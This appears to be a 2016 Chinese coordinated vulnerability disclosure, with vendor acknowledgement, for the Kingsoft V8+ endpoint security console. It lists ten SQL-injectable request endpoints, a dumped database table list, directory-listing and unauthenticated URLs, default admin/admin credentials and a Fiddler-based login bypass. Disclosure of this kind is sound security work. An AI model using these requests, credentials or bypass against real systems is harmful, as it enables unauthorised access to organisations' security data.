2016-03-01: 细节已通知厂商并且等待厂商处理中 2016-03-01: 厂商已经确认,细节仅向厂商公开 2016-03-04: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航、无声信息) 2016-04-25: 细节向核心白帽子及相关领域专家公开 2016-05-05: 细节向普通白帽子公开 2016-05-15: 细节向实习白帽子公开 2016-05-30: 细节向公众公开
金山V8+终端安全系统10处SQL注入+默认配置不当+后台权限绕过
看下产品介绍先
SQL注入比较多,10处如下:
1.POST /active_defense/scan/get_group_list_cmd.kptl HTTP/1.1Host: **.**.**.**:6868Content-Length: 149Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/active_defense/scan/main.php?li=4&a=7Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}2.POST /report/log/get_log_cmd.kptl HTTP/1.1Host: **.**.**.**:6868Content-Length: 408Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"20","log_request_page":"2","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}3.POST /report/report/ajax.kptl HTTP/1.1Host: **.**.**.**:6868Content-Length: 205Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/report/report/main.php?li=5&a=14Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_report_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","period_type":"-1","count_page":"2","request_page":"1","VHierarchyID":"ADMIN"}}4.POST /report/log/get_log_cmd.kptl HTTP/1.1Host: **.**.**.**:6868Content-Length: 409Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/report/log/main.php?li=5&a=12Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_log_cmd":{"log_virus_type":["1","2","3","4","5","6","7"],"log_deal_type":["1","2","3","4"],"nDate":"1","log_time_start":"0","log_time_end":"0","nIp":"1","log_ip_start":"0","log_ip_end":"0","nSearchByVirusOrPC":"1","search_text":"","log_count_page":"100","log_request_page":"1","userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}5.POST /softmanagement/distribute/get_group_list_cmd.kptl HTTP/1.1Host: **.**.**.**:6868Content-Length: 149Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/softmanagement/distribute/main.php?li=3&a=6Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}6.POST /boundary_manage/ajax.kptl HTTP/1.1Host: **.**.**.**:6868Content-Length: 372Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%221%22%2C%22stype%22%3A%221%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A1%7DReferer: **.**.**.**:6868/boundary_manage/boundary_file.php?li=2&a=2Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_file_name_details_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","groupids":["1"],"boundary_type":"5","time_type":"4","start_time":"0","end_time":"0","file_md5":"72C84AE241A44567B31CA2B4FB7557C9","sort_type":"download_time","sort_order":"desc","page_count":"10","current_page":"1"}}7.POST /client_manage/group/get_group_list_cmd.kptl HTTP/1.1Host: **.**.**.**:6868Content-Length: 149Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%226%22%2C%22rtype%22%3A%225%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%221%22%2C%22curtab%22%3A2%7D; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/client_manage/group/main.php?li=1&a=1Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}8.POST /settings/system/get_group_list_cmd.kptl HTTP/1.1Origin: **.**.**.**:6868Content-Length: 149Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/settings/system/groups.php?li=6&a=15Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}9.POST /softmanagement/forbidden/get_group_list_cmd.kptl HTTP/1.1Origin: **.**.**.**:6868Content-Length: 149Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_group_list_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN"}}10.POST /softmanagement/forbidden/get_classify_list_info_cmd.kptl HTTP/1.1Origin: **.**.**.**:6868Content-Length: 288Accept-Language: zh-CN,zh;q=0.8Userhash: cond0rAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Host: **.**.**.**:6868X-Requested-With: XMLHttpRequestCookie: PHPSESSID=nufh19pbvgc1hdudrra40grrj2; GUID=B92441F0-B325-453C-9758-111D7AB69190; SCIP=**.**.**.**; topSC=1; popedom=2222222222; B92441F0-B325-453C-9758-111D7AB69190admin=%7B%22btype%22%3A%225%22%2C%22rtype%22%3A%220%22%2C%22stype%22%3A%220%22%2C%22dtype%22%3A%220%22%2C%22gids%22%3A%5B%221%22%5D%2C%22ttype%22%3A%224%22%2C%22stime%22%3A%220%22%2C%22etime%22%3A%220%22%2C%22stext%22%3A%22%22%2C%22curtab%22%3A1%7D; kidtype=6966; hid=3MH00B5M; sn=107000-011007-240336-400661; scName=PILIBABY-SERVER(1); SCNum=1Referer: **.**.**.**:6868/softmanagement/forbidden/main.php?li=3&a=5Content-Type: application/x-www-form-urlencoded; charset=UTF-8Accept-Encoding: gzip, deflate{"get_classify_list_info_cmd":{"userSession":"5E350D13-F093-4CD0-A5FE-9DCFBFCFF21D","mode_id":"B92441F0-B325-453C-9758-111D7AB69190","VHierarchyID":"ADMIN","classify_id":"-1","group_id":"ADMIN","key_words":"3","count_page":"20","current_page":"1","sort_type":"state","sort_order":"desc"}}
Database: SQLite_masterdb[69 tables]+-----------------------------+| ArpClientMacIp || ArpInfo || ArpInfo_History || ArpOptions || BDLogManagerOptions || BoundaryOptions || ClientDelete || ClientInfoCollect || ClientScanFinishInfo || ClientStaInfo || ClientUpdateOptions || ClientVersionInfo || ClientVirusCollect || DefaultPopedom || DomainGroupInfo || GroupInfo || HostInfo || HostSoftLeakScanInfo || HostSysLeakScanInfo || IPFilter || KChildSysCenterIPInfo || KClearOpenOptions || KFilePushInfo || KForbidSoftInfo || KGroupIP || KLncncCompanyInfo || KReport || KSimpleSoftInfo || KSoftUninstallStrategy || KSoftWareMgrOptions || KUninstallSoftInfo || KVDeviceGroupIP || KVDeviceGroupInfo || KVDipatcherPlanTask || KVMEngineOptions || LeakRepairStategy || LeakScanRepairCmd || MailMonOptions || MailMonVirusInfo || NetWorkManagerInfo || ReportIndex || ReportOnlineIPSet || ReportStrategy || RootWhiteListInfo || SCMessageLog || SCOperLog || SCOperation || SCUser || ScanConfigOptions || ScanOptions || StrongManagerOptions || SysMonitorOpt || SystemCenterTree || TaskOptions || UDiskAgentOptions || UDiskOptions || USBOptions || UninstallKavClientIPs || UserPopedom || VHierarchyBaseVirusDealInfo || VHierarchyInfo || VHierarchySetupInfo || VirusCountInfo || VirusInfo || ViuusInfoCollect || WatchOptions || _GroupInfo_old_20131010 || sqlite_sequence || webconfig |+-----------------------------+
默认配置不当,系统默认开启了目录遍历举几个例子
http://**.**.**.**/boundary_manage/**.**.**.**:6868/active_defense/**.**.**.**:6868/report/http://**.**.**.**/active_defense/**.**.**.**:6868/settings/
还有很多不列举了,找了几个案例证明下
然后发现许多页面都可以未授权访问,由于页面比较多没有一一尝试,厂商统一限制下吧,文件名中有excel字样的都是直接下载对应的数据的。列举几处
**.**.**.**:6868/active_defense/scan/task.php**.**.**.**:6868/active_defense/scan/export.php**.**.**.**:6868/report/log/excel2.php**.**.**.**:6868/report/log/analyse.php**.**.**.**:6868/report/log/date_select.php**.**.**.**:6868/report/log/excel.php**.**.**.**:6868/report/general/ksafecount.phphttp://**.**.**.**/active_defense/scan/task.phphttp://**.**.**.**/boundary_manage/boundary_file_report.phphttp://**.**.**.**/active_defense/scan/task.php
顺便提一下后台存在默认口令admin/admin
以上的未授权访问发现看到的数据比较有限,于是又测试了一番,发现后台完全可以绕过。。。系统的所有页面访问时会判断是否登录,请求如下:
GET /login.php HTTP/1.1Host: **.**.**.**:6868Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36Referer: **.**.**.**:6868/settings/system/groups.php?li=0&a=0Accept-Encoding: gzip, deflate, sdchAccept-Language: zh-CN,zh;q=0.8
这个请求会跳转到登录页,那么只要在fiddler中,输入拦截该url即可绕过。
可以查看系统配置,密码,还可以修改公告并且公告处存在XSS,上传热门工具。。看下效果
过滤+权限
危害等级:中
漏洞Rank:8
确认时间:2016-03-01 20:06
感谢对金山安全关注,已反馈给业务跟进修复,谢谢提交
暂无
前排膜拜niliu大师傅